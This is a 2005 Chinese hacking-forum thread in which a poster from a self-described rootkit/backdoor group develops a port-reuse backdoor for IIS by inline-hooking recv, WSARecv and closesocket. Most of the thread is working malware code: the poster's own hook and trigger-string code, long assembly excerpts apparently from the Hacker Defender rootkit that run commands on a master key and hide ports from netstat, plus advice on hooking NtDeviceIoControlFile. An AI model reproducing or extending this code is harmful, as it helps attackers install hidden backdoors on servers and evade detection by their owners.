| 发表于:2005-03-04 10:44 |
发帖: 317
积分: 0
注册: 2004-01-22
TK曾说过,HXDEF用hook recv和WSARecv的方法来实现端口复用的后门连接。
我现在hook了他们和closesocket,结果试我自己的IIS,closesocket可以捕获,但是recv和WSARecv就没有任何反映!是TK欺骗了我?还是我编程上的问题?各位帮忙看一下
我的代码:
//begin network,do hook recv&WSArecv&closesocket
LoadLibrary("WS2_32.dll");LoadLibrary("wshtcpip.dll");LoadLibrary("WS2HELP.DLL");
LoadLibrary("msafd.dll");//加载必要模块否则在解除映射后可能缺少需要的库
DWORD __stdcall thunkcode();
int len=0;
int tmp;
disasm_struct s;
BYTE* allocaddr;
s.disasm_defdata=s.disasm_defaddr=4;
//recv
BYTE* target=(BYTE*)GetProcAddress(LoadLibrary("WS2_32.dll"),"recv");
while(len<5){
len+=disasm(target+len,&s);
}
allocaddr=(BYTE*)thunkcode;
memcpy(allocaddr,target,len);
*(int*)(allocaddr+16)=target+len-allocaddr-0x14;//修正thunkcode jmp
VirtualProtect(target,len,PAGE_EXECUTE_READWRITE,(DWORD*)&tmp);
*target=0xe9;
*(DWORD*)(target+1)=allocaddr+0x14-target-5;
//WSArecv
target=(BYTE*)GetProcAddress(LoadLibrary("WS2_32.dll"),"WSARecv");
len=0;//忘了清0付出惨痛代价
while(len<5){
len+=disasm(target+len,&s);
}
allocaddr=(BYTE*)thunkcode+0x64;
memcpy(allocaddr,target,len);
*(int*)(allocaddr+16)=target+len-allocaddr-0x14;//修正thunkcode jmp
VirtualProtect(target,len,PAGE_EXECUTE_READWRITE,(DWORD*)&tmp);
*target=0xe9;
*(DWORD*)(target+1)=allocaddr+0x14-target-5;
//closesocket
target=(BYTE*)GetProcAddress(LoadLibrary("WS2_32.dll"),"closesocket");
len=0;
while(len<5){
len+=disasm(target+len,&s);
}
allocaddr=(BYTE*)thunkcode+0xd4;
memcpy(allocaddr,target,len);
*(int*)(allocaddr+16)=target+len-allocaddr-0x14;//修正thunkcode jmp
VirtualProtect(target,len,PAGE_EXECUTE_READWRITE,(DWORD*)&tmp);
*target=0xe9;
*(DWORD*)(target+1)=allocaddr+0x14-target-5;
//hook complete
while(1){Sleep(100);
dwThreadId=0;DWORD WINAPI threadfunc( LPVOID lpParam );
if(sockuse){
__asm int 3;
threadfunc((void*)sockuse);sockuse=0;}
}
return 0;}
__declspec(naked)
DWORD __stdcall thunkcode(){
__asm{//没有移动位置故不需要重定位
orirecv:
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
//15个nop留下应该够了
__emit 0xe9
__emit 0
__emit 0
__emit 0
__emit 0
//跳回原来的API后面部分
myrecv://offest:0x14
push ebp
mov ebp,esp
push [ebp+14h]
push [ebp+10h]
push [ebp+0ch]
push [ebp+8]
call orirecv
cmp sockuse,0
jnz noaction1
cmp eax,0
jz noaction1
cmp eax,SOCKET_ERROR
jz noaction1
mov esi,[ebp+0ch]
mov edi,offset characteristic
cld
mov ecx,10h
int 3
repz cmpsb
jz manipulateit1
noaction1:
pop ebp
ret 10h
manipulateit1:
mov edx,[ebp+8]
mov sockuse,edx
mov eax,0
pop ebp
ret 10h
oriWSARecv://offset:0x64
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
//15个nop留下应该够了
__emit 0xe9
__emit 0
__emit 0
__emit 0
__emit 0
//跳回原来的API后面部分
myWSARecv:
push ebp
mov ebp,esp
push [ebp+20h]
push [ebp+1ch]
push [ebp+18h]
push [ebp+14h]
push [ebp+10h]
push [ebp+0ch]
push [ebp+8]
call oriWSARecv
cmp sockuse,0
jnz noaction2
cmp eax,0
jz noaction2
cmp eax,SOCKET_ERROR
jz noaction2
mov esi,[ebp+0ch]
mov esi,[esi+4]
mov edi,offset characteristic
cld
mov ecx,10h
int 3
repz cmpsb
jz manipulateit2
noaction2:
pop ebp
ret 1ch
manipulateit2:
mov edx,[ebp+8]
mov sockuse,edx
mov eax,0
pop ebp
ret 1ch
oriclosesocket://0xd4
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
//15个nop留下应该够了
__emit 0xe9
__emit 0
__emit 0
__emit 0
__emit 0
//跳回原来的API后面部分
myclosesocket://offest:0x
push ebp
mov ebp,esp
mov eax,sockuse
int 3
cmp eax,[ebp+8]
jz manipulate3
noaction3:
push [ebp+8]
call oriclosesocket
pop ebp
ret 4
manipulate3:
pop ebp
xor eax,eax
ret 4
characteristic:
__emit 19h
__emit 85h
__emit 08h
__emit 28h
__emit 'b'
__emit 'a'
__emit 'i'
__emit 'y'
__emit 'u'
__emit 'a'
__emit 'n'
__emit 'f'
__emit 'a'
__emit 'n'
__emit 'g'
__emit 0ffh
__emit 0h
}
}
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-04 11:09 |
发帖: 1120
积分: 75
注册: 2002-09-04
在2002的XCON里,我的议题部分涉及HOOK recv/wsarecv的技术
当时就谈到了一个问题,针对完成端口的SOCKET编程模式,HOOK recv/wsarecv会存在一些问题.
而不幸的是,IIS里的全部是采用完成端口模式编写的SOCKET,因此你就无须抱怨TK了
---
无论将来我们多么富有,或者多么有成就,我们必须站在苦难者的一边,因为那是做人的立场
| 发表于:2005-03-04 12:35 |
发帖: 317
积分: 0
注册: 2004-01-22
谢谢闪空提醒,呵呵,我回去换个断点位置试试。
异步的重叠IO模式真是麻烦呀。
PS:TK的RP有WT,不抱怨他抱怨谁?不抱怨也要找理由抱怨,嘿嘿。。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-04 23:27 |
发帖: 317
积分: 0
注册: 2004-01-22
今天做了实验,完成端口模式编写的SOCKET下,在截获了WSARecv返回的数据缓冲区里并没有我们想要的数据,而这些数据应该会在
CompletionRoutine或者EVENT产生时返回到缓冲区。郁闷呀,FS,TK,glacier等高手们帮忙啊,我该怎么办呢?谢谢各位呀
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-06 09:46 |
发帖: 8
积分: 0
注册: 2004-03-21
根据具体用处的不同,建议你改用ipfilterdriver或firewall-hook(主要区别在于是否要处理transmit出去的数据)
| 发表于:2005-03-06 10:54 |
发帖: 347
积分: 1
注册: 2003-10-09
关注ing...
| 发表于:2005-03-06 13:45 |
发帖: 317
积分: 0
注册: 2004-01-22
限制用ring3级hook,这个项目中不考虑ring0的实现方案
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-06 19:18 |
发帖: 317
积分: 0
注册: 2004-01-22
摘自Network Programming for Windows:
Wi n s o c k提供了一些有趣的I / O模型,有助于应用程序通过一种“异步”方式,一次对一个或多个套接字上进行的
通
信加以管理。这些模型包括s e l e c t(选择)、W S A A s y n c S e l e c t(异步选择)、W S A E v
e n t S e l e c t(事件选择)、Overlapped I/O(重叠式I / O)以及Completion
port(完成端口)等等。
我的理解:
1是阻塞式的,2和3是非重叠异步式的,他们应该是都在事件触发之后再调用一次
recv/wsarecv,对我们的hook没有影响。然而后两者是重叠式的异步IO,在WSARecv失败之后到事件发生时数据已经到达了buffer
而没有再经过一次recv/wsarecv调用。
因此我们拦截recv/wsarecv似乎无效。
请高手指点!谢谢
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-07 00:28 |
发帖: 1880
积分: 26
注册: 2001-03-04
你HOOK IIS的send函数成功了吗?
---
浮生事,苦海舟,荡去漂来不自由
| 发表于:2005-03-07 09:43 |
发帖: 317
积分: 0
注册: 2004-01-22
这个项目里不需要hook send函数,所以没有做实验。但是我想对于异步重叠IO来说,wsasend和wsarecv应该是一样吧
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-07 16:10 |
发帖: 3061
积分: 0
注册: --
顶,问题关注中
| 发表于:2005-03-07 19:19 |
发帖: 48
积分: 0
注册: 2003-09-24
hxdef就是拦截WSARecv和recv,而且也实现了完成端口的拦截
可以参考一下
这几天也在弄这个问题,可惜看到hxdef那一堆的汇编和delphi就头痛
| 发表于:2005-03-07 19:53 |
发帖: 199
积分: 0
注册: 2003-08-16
咋就不考虑一下ReadFile/WriteFile 呢
| 发表于:2005-03-07 20:07 |
发帖: 317
积分: 0
注册: 2004-01-22
楼上的兄弟说深入一些好吗?小弟是菜鸟
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-08 19:33 |
发帖: 317
积分: 0
注册: 2004-01-22
dumplogin老兄,我对WSOCK不是很了解啊!你的意思是不是:
非重叠IO的异步WSARecv是在得到TDI的数据到来通知后,是又调用了一次WSARecv,不影响hook
而重叠IO的WSARecv在得到TDI的数据到来通知后虽然没有再调用一次WSARecv,数据就到了缓冲区,但是其实是在收到通知后调用了NtReadFile?
而且进一步,是不是所有(wsa)recv函数实际都是通过NtReadFile实现?
但是我看过一些TDI的驱动,他的数据收发是在IRP_MJ_INTERNAL_DEVICE_CONTROL里的TDI_XXXXXXX函数实现的,和普通的FSD不一样。
谢谢指教!
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-09 10:35 |
发帖: 199
积分: 0
注册: 2003-08-16
我的意思是说, windows想读取SOCKET的内容,并不一定只有recv/wsarecv, 用ReadFile照样可以读, WriteFile可写.
你思路局限在WSOCK上面, 可能会碰到无法解决的东西.
| 发表于:2005-03-09 10:53 |
发帖: 317
积分: 0
注册: 2004-01-22
其实我主要是问recv/wsarecv或者重叠IO的recv/wsarecv最后是调用了NtReadFile还是就是NtDeviceIOControl?
即使如果是NtReadFile,那个filehandle和socket之间有什么样的对应关系??返回值的意义相同吗?
而且如果在NtReadFile中指定了userAPC的参数的话,我们hook NtReadFile也一样没有用吧,除非去hook那个APC
谢谢各位高手指教啊
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-11 15:42 |
发帖: 35
积分: 0
注册: 2004-11-10
同意dumplogin 的说法,我自己测试hook SVCHOST(RPC
服务)进程中的recv,替换的函数包括wsock32和ws2_32中的recv()。在此之前普通程序可以成功,但是在该进程却通不过。我当时就怀疑
是该进程中接受socket数据的函数不是recv。
继续研究!
| 发表于:2005-03-12 17:36 |
发帖: 317
积分: 0
注册: 2004-01-22
花了两天工夫看了看黑客守卫者的代码,终于发现了问题,TK说的不完全正确,recv/wsarecv的确是hook了,但是还有些更重要的,大家看看:
1 recv/wsarecv
//TWSARecv=function(const
ASock:TSocket;ABuffers:LPWSABUF;ABufferCount:DWORD;var
VNumberOfBytesRecvd:DWORD;var
VFlags:DWORD;AOverlapped:LPWSAOVERLAPPED;ACompletionRoutine:LPWSAOVERLAPPED_COMPLETION_ROUTINE):Integer;
stdcall;
@fNewWSARecv:
push 004h //local variables
call @NewAPIHead
{
-004 - LResult:Cardinal
}
mov dword ptr [ebp-004h],SOCKET_ERROR
mov edi,[ebp+01Ch]
mov esi,[ebp+014h] //newfeature
lea eax,[ebx+@HT_OldWSARecv]
test dword ptr [eax+011h],-001h
jz @fNewWSARecv_end
push dword ptr [ebp+020h] //ACompletionRoutine
push dword ptr [ebp+01Ch] //AOverlapped
push dword ptr [ebp+018h] //VFlags
push dword ptr [ebp+014h] //VNumberOfBytesRecvd
push dword ptr [ebp+010h] //ABufferCount
push dword ptr [ebp+00Ch] //ABuffers
push dword ptr [ebp+008h] //ASock
call eax
mov [ebp-004h],eax
test eax,eax
jz @fNewWSARecv_nulres
inc eax
jnz @fNewWSARecv_gotbuf
call [ebx+@WSAGetLastErrorAddr]
cmp eax,ERROR_IO_PENDING
jnz @fNewWSARecv_end
@fNewWSARecv_nulres:
test edi,edi
jnz @fNewWSARecv_overlapped
mov eax,[esi]
test eax,eax
jz @fNewWSARecv_end
inc eax
jmp @fNewWSARecv_gotbuf
@fNewWSARecv_overlapped:
mov eax,[ebp+00Ch]
mov eax,[eax+004h]
test eax,eax
jz @fNewWSARecv_end
mov esi,eax
push MASTER_KEY_LEN
push esi
call [ebx+@IsBadReadPtrAddr]
test eax,eax
jnz @fNewWSARecv_lookaround
lea edi,[ebx+@cMasterKey]
call @cmp2pchars_casesens
test eax,eax
jnz @fNewWSARecv_doexec
@fNewWSARecv_lookaround:
sub esi,MASTER_KEY_LEN
push MASTER_KEY_LEN
push esi
call [ebx+@IsBadReadPtrAddr]
test eax,eax
jnz @fNewWSARecv_end
jmp @fNewWSARecv_DoCompareBuf
@fNewWSARecv_gotbuf:
cmp eax,MASTER_KEY_LEN+1
jne @fNewWSARecv_end
mov esi,[ebp+00Ch]
mov esi,[esi+004h]
@fNewWSARecv_DoCompareBuf:
lea edi,[ebx+@cMasterKey]
call @cmp2pchars_casesens
test eax,eax
jz @fNewWSARecv_end
@fNewWSARecv_doexec:
xor eax,eax
mov [esi],eax
push dword ptr [ebp+008h]
call @DoExec
xor eax,eax
mov ecx,[ebp+014h]
mov [ecx],eax
mov [ebp-004h],eax
@fNewWSARecv_end:
push 01Ch
jmp @NewAPITail
2 更重要的,嘿嘿。
//TReadFile=function(AFile:THandle;ABuffer:Pointer;ANumberOfBytesToRead:DWORD;ANumberOfBytesRead:PDWORD;AOverlapped:POverlapped):BOOL;stdcall;
@fNewReadFile:
push 004h //local variables
call @NewAPIHead
{
-004 - LResult:Boolean
}
push 000h
pop dword ptr [ebp-004h]
lea eax,[ebx+@HT_OldReadFile]
test dword ptr [eax+011h],-001h
jz @fNewReadFile_end
mov esi,[ebp+00Ch]
push dword ptr [ebp+018h] //AOverlapped
push dword ptr [ebp+014h] //ANumverOfBytesRead
push dword ptr [ebp+010h] //ANumverOfBytesToRead
push dword ptr [ebp+00Ch] //ABuffer
push dword ptr [ebp+008h] //AFile
call eax
mov [ebp-004h],eax
mov ecx,eax
mov eax,[ebp+014h]
test eax,eax
jz @fNewReadFile_overlapped
mov eax,[eax]
inc eax
test ecx,ecx
jnz @fNewReadFile_gotbuf
@fNewReadFile_overlapped:
call [ebx+@GetLastErrorAddr]
cmp eax,ERROR_IO_PENDING
jnz @fNewReadFile_end
test esi,esi //newfeature
jz @fNewReadFile_end
push MASTER_KEY_LEN
push esi
call [ebx+@IsBadReadPtrAddr]
test eax,eax
jnz @fNewReadFile_lookaround
lea edi,[ebx+@cMasterKey]
call @cmp2pchars_casesens
test eax,eax
jnz @fNewReadFile_doexec
@fNewReadFile_lookaround:
sub esi,MASTER_KEY_LEN
push MASTER_KEY_LEN
push esi
call [ebx+@IsBadReadPtrAddr]
test eax,eax
jnz @fNewReadFile_end
push MASTER_KEY_LEN
pop ecx
@fNewReadFile_lookaround_loop:
push ecx
lea edi,[ebx+@cMasterKey]
call @cmp2pchars_casesens
pop ecx
test eax,eax
jnz @fNewReadFile_doexec
inc esi
loop @fNewReadFile_lookaround_loop
jmp @fNewReadFile_end
@fNewReadFile_gotbuf:
cmp eax,MASTER_KEY_LEN+1
jne @fNewReadFile_end
mov esi,[ebp+00Ch]
@fNewReadFile_DoCompareBuf:
lea edi,[ebx+@cMasterKey]
call @cmp2pchars_casesens
test eax,eax
jz @fNewReadFile_end
@fNewReadFile_doexec:
xor eax,eax
mov [esi],eax
push dword ptr [ebp+008h]
call @DoExec
xor eax,eax
inc eax
mov [ebp-004h],eax
mov eax,[ebp+00Ch]
mov [eax],000h
mov eax,[ebp+014h]
test eax,eax
jz @fNewReadFile_end
mov [eax],000h
@fNewReadFile_end:
push 014h
jmp @NewAPITail
3 还有一个就是NtDeviceIoControlFile似乎和后门连接没关系
//TNtDeviceIoControlFile=function(AFileHandle,AEvent:THandle;AApcRoutine,AApcContext,AIoStatusBlock:Pointer;AIoControlCode:Cardinal;AInputBuffer:Pointer;AInputBufferLength:Cardinal;AOutputBuffer:Pointer;AOutputBufferLength:Cardinal):Cardinal;stdcall;
@fNewNtDeviceIoControlFile:
push 090h //local variables
{
-090..014 - LBuf:array of Char
-010 - LLocPortOfs:Cardinal
-00C - LROWSize:Cardinal
-008 - LFileMappingAddr:Pointer
-004 - LResult:Boolean
}
call @NewAPIHead
push 000h
pop dword ptr [ebp-004h]
lea eax,[ebx+@HT_OldNtDeviceIoControlFile]
test dword ptr [eax+011h],-001h
jz @fNewNtDeviceIoControlFile_end
push dword ptr [ebp+02Ch] //AOutputBufferLength
push dword ptr [ebp+028h] //AOutputBuffer
push dword ptr [ebp+024h] //AInputBufferLength
push dword ptr [ebp+020h] //AInputBuffer
push dword ptr [ebp+01Ch] //AIoControlCode
push dword ptr [ebp+018h] //AIoStatusBlock
push dword ptr [ebp+014h] //AApcContext
push dword ptr [ebp+010h] //AApcRoutine
push dword ptr [ebp+00Ch] //AEvent
push dword ptr [ebp+008h] //AFileHandle
call eax
mov [ebp-004h],eax
test eax,eax
jnz @fNewNtDeviceIoControlFile_end
mov eax,[ebp+01Ch] //AIoControlCode
cmp eax,000120003h
jz @fNewNtDeviceIoControlFile_query
cmp eax,000210012h
jnz @fNewNtDeviceIoControlFile_end
@fNewNtDeviceIoControlFile_query:
lea esi,[ebp-090h] //LBuf
push 000h
pop [esi]
push 000h //ReturnLength
push 07Ch //ObjectInformationLength
push esi //ObjectInformation
push 001h //ObjectInformationClass = ObjectNameInformation
push [ebp+008h] //ObjectHandle
call [ebx+@NtQueryObjectAddr]
{ test eax,eax
jnz @fNewNtDeviceIoControlFile_end}
xor eax,eax //cuz of NT4 
push 004h
pop dword ptr [ebp-010h] //LLocPortOfs = UDP
mov [ebp-00Ch],MIB_UDPROW_SIZE //LROWSize = UDP
movzx ecx,word ptr [esi] //ecx -> length in AnsiString
test ecx,ecx
jz @fNewNtDeviceIoControlFile_end
add esi,008h //edi -> name in AnsiString
mov [esi+ecx],ax //add null on the end of wchar
lea edi,[ebx+@cDeviceTCP]
call @cmp_wide_pchar_caseinsens
xor ecx,ecx
test eax,eax
jnz @fNewNtDeviceIoControlFile_relevant
lea edi,[ebx+@cDeviceUDP]
call @cmp_wide_pchar_caseinsens
test eax,eax
jz @fNewNtDeviceIoControlFile_end
push 01h
pop ecx
@fNewNtDeviceIoControlFile_relevant:
mov eax,[ebp+01Ch] //AIoControlCode
cmp eax,000120003h
jz @fNewNtDeviceIoControlFile_like_netstat
cmp dword ptr [ebp+024h],TDI_CONN_IN_SIZE //AInputBufferLength
jnz @fNewNtDeviceIoControlFile_end
mov eax,[ebp+020h]
mov eax,[eax+010h] //TdiConnIn.RemoteAddressLength
sub eax,03h //should be 3
jz @fNewNtDeviceIoControlFile_like_fport
dec eax //or 4
jnz @fNewNtDeviceIoControlFile_end
@fNewNtDeviceIoControlFile_like_fport: //TCP: ecx = 0 | UDP: ecx = 1
mov esi,[ebp+028h] //AOutputBuffer
test esi,esi
jz @fNewNtDeviceIoControlFile_end
push ecx
call @OpenFileMapping
test eax,eax
jz @fNewNtDeviceIoControlFile_pend
mov [ebp-008h],eax
mov edi,eax
push FMP_HIDDEN_PORTS
call @GetFileMappingConst
pop ecx
jecxz @fNewNtDeviceIoControlFile_fgo
movzx eax,word ptr [edi]
shl eax,001h
add edi,eax //number of TCP ports * 2 (sizeof(ushort))
inc edi
inc edi //+ sizeof(ushort)
@fNewNtDeviceIoControlFile_fgo:
inc edi
inc edi //+ sizeof(ushort)
xor eax,eax
xchg esi,edi
movzx ecx,word ptr [edi+00Ch]
xchg ch,cl //htons 
@fNewNtDeviceIoControlFile_floop:
lodsw
test eax,eax
jz @fNewNtDeviceIoControlFile_CloseMapping
cmp eax,ecx
jnz @fNewNtDeviceIoControlFile_floop
mov [ebp-004h],0C0000141h //STATUS_INVALID_ADDRESS
push TDI_CONN_OUT_FREE_SIZE
pop ecx
xor eax,eax
rep stosb
mov eax,[ebp+018h] //AIoStatusBlock
test eax,eax
jz @fNewNtDeviceIoControlFile_CloseMapping
mov [eax+004h],ecx
jmp @fNewNtDeviceIoControlFile_CloseMapping
@fNewNtDeviceIoControlFile_like_netstat: //and fport xp
cmp dword ptr [ebp+024h],024h //AInputBufferLength
jb @fNewNtDeviceIoControlFile_end //should be => 024h
mov ecx,[ebp+020h] //AInputBuffer
cmp byte ptr [ecx+001h],004h //2nd byte of AInputBuffer
jne @fNewNtDeviceIoControlFile_end //should be = 004h
cmp byte ptr [ecx+011h],001h //17th byte of AInputBuffer
jne @fNewNtDeviceIoControlFile_end //should be = 001h
movzx eax,byte ptr [ecx] //0 if TCP, 1 if UDP
push eax
dec eax
jz @fNewNtDeviceIoControlFile_dif_ex
add dword ptr [ebp-00Ch],MIB_TCPROW_SIZE-MIB_UDPROW_SIZE //LROWSize = TCP
add dword ptr [ebp-010h],004h //LLocPortOfs = TCP
@fNewNtDeviceIoControlFile_dif_ex:
movzx eax,byte ptr [ecx+010h] //1 = normal, 2 = extended
dec eax
jz @fNewNtDeviceIoControlFile_OpenMapping
dec eax
jnz @fNewNtDeviceIoControlFile_pend //no normal, no ex?
add dword ptr [ebp-00Ch],004h //extended = + PID
@fNewNtDeviceIoControlFile_OpenMapping:
call @OpenFileMapping
test eax,eax
jz @fNewNtDeviceIoControlFile_pend
mov [ebp-008h],eax
mov edi,eax
push FMP_HIDDEN_PORTS
call @GetFileMappingConst
pop ecx
jecxz @fNewNtDeviceIoControlFile_go
movzx eax,word ptr [edi]
shl eax,001h
add edi,eax //number of TCP ports * 2 (sizeof(ushort))
inc edi
inc edi //+ sizeof(ushort)
@fNewNtDeviceIoControlFile_go:
inc edi
inc edi //edi on tcp | udp ports
mov esi,[ebp+028h] //AOutputBuffer
mov eax,[ebp+018h] //AIoStatusBlock
mov eax,[eax+004h] //AIoStatusBlock.Information
cdq
push dword ptr [ebp-00Ch] //LROWSize
pop ecx
div ecx
xchg edx,eax //edx should be 0 after div
test eax,eax
jnz @fNewNtDeviceIoControlFile_CloseMapping
test edx,edx
jz @fNewNtDeviceIoControlFile_CloseMapping
xchg esi,edi
@fNewNtDeviceIoControlFile_row_loop:
push esi
@fNewNtDeviceIoControlFile_port_loop:
lodsw //eax -> hidden port number
test eax,eax
jz @fNewNtDeviceIoControlFile_next_row
xchg ah,al //ntohs
mov ecx,[ebp-010h] //LLocPortOfs
cmp eax,[edi+ecx] //MIB_[TCP|UDP]ROW.dwLocalPort
jnz @fNewNtDeviceIoControlFile_port_loop
push edi
push esi
push edx
push dword ptr [ebp-00Ch] //LROWSize
pop ecx
push ecx
mov eax,edx
dec eax
cdq
mul ecx
mov ecx,eax
mov eax,[ebp-00Ch] //LROWSize
lea esi,[edi+eax]
rep movsb
mov eax,[ebp+018h] //AIoStatusBlock
mov ecx,[ebp-00Ch] //LROWSize
sub dword ptr [eax+004h],ecx //AIoStatusBlock.Information
pop ecx
xor eax,eax
rep stosb //del last record
//we don't need this cuz of changing AIoStatusBlock.Information
//but would be possible to detect hxdef when
//debugging netstat cuz may be quite strange to have last record
//copied several times after the end of AOutputBuffer
pop edx
pop esi
pop edi
jmp @fNewNtDeviceIoControlFile_next_record
@fNewNtDeviceIoControlFile_next_row:
add edi,[ebp-00Ch]
@fNewNtDeviceIoControlFile_next_record:
pop esi
dec edx
jnz @fNewNtDeviceIoControlFile_row_loop
@fNewNtDeviceIoControlFile_CloseMapping:
push dword ptr [ebp-008h]
call @CloseFileMapping
push ecx
@fNewNtDeviceIoControlFile_pend:
pop ecx
@fNewNtDeviceIoControlFile_end:
push 028h
jmp @NewAPITail
各位大牛可要评论呀。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-12 17:40 |
发帖: 317
积分: 0
注册: 2004-01-22
另外说下我自己挂接iis的wsarecv/recv的结果,在客户连接时的确有wsarecv调用,但是这个调用会阻塞,在阻塞的时间里客户端已经得到
了网页的数据,网页已经显示了出来。一段明显的延迟后,wsarecv才返回。而且是返回-1。我也比较晕,毕竟是菜鸟,等各位大虾评论吧,希望各位教教
小弟。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-13 17:07 |
发帖: 15
积分: 0
注册: 2004-08-31
关注
| 发表于:2005-03-14 19:23 |
发帖: 317
积分: 0
注册: 2004-01-22
根据最近向无花果兄讨教的结果,比较可能的是,IIS的完成端口模式,是用wsarecv来传输连接状态,所以我们可以挂钩到wsarecv的调用,但是
它并不负责数据传输,所以我们发现它是延时的。而根据hxdef挂钩readfile来判断,IIS可能是用readfile来读取数据。并且知道,
IIS6 direct talk to
http.sys不通过wsock。所以我觉得不去WIN32API层挂钩是一个好选择。现在看来NtDeviceIoControlFile是个不错的
替补对象。
我挂了它,访问自己的IIS,SICE弹出7-8次。看来的确不错。但是还是有问题,这个系统服务未公开,很多参数不知道意义。
status = NtDeviceIoControlFile(
(HANDLE)Handle,
event,
apcRoutine,
apcContext,
ioStatusBlock,
IOCTL_AFD_RECEIVE,
&recvInfo,
sizeof(recvInfo),
NULL,
0
);
1。不知道AFD_RECV_INFO结构定义,就不知道buffer的位置,无法提取数据。
2。不知道IOCTL_AFD_RECEIVE的值就没法分辨recv和其他的TDI调用,如accept,closesocket,send等。
强烈希望潜水的高手们露个头,帮助一下:)
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-15 15:10 |
发帖: 3234
积分: 11
注册: 2001-09-20
刚才调了一下,你看看能不能用:
#define IOCTL_AFD_RECEIVE 0x00012017
buffer = *(char *)(*(DWORD *)recvInfo + sizeof(DWORD))
---
我寒不能怨人傻
人傻不能怨政府
| 发表于:2005-03-15 16:29 |
发帖: 317
积分: 0
注册: 2004-01-22
把我自己挂它的实验结果放上来。
ntdevioctrl:后面是10个参数的值。invoke result:是返回结果。0成功,103pending
这是我一个get请求截下来的。
ntdevioctrl:670 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:680 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:690 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:780 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:790 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7dc 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7ec 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7fc 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:814 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:824 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:834 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:87c 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:88c 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:678 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:688 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:778 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:788 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:798 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7e4 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:7f4 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:81c 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:82c 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:874 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:884 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:894 8a4 0 0 76fb44 1207b 76fb34 10 76fb34 10
invoke result:0
ntdevioctrl:8b0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f27dfc f27dfc 12083 104fcc8 44 11e9b8 840
invoke result:103
ntdevioctrl:8b4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f27f54 f27f54 12083 104fcc8 44 11f390 840
invoke result:103
ntdevioctrl:8b8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f280ac f280ac 12083 104fcc8 44 11fd30 840
invoke result:103
ntdevioctrl:8bc 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28204 f28204 12083 104fcc8 44 1207e0 840
invoke result:103
ntdevioctrl:8c0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2835c f2835c 12083 104fcc8 44 121290 840
invoke result:103
ntdevioctrl:8c4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f284b4 f284b4 12083 104fcc8 44 12f008 840
invoke result:103
ntdevioctrl:8c8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2860c f2860c 12083 104fcc8 44 12f850 840
invoke result:103
ntdevioctrl:8cc 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
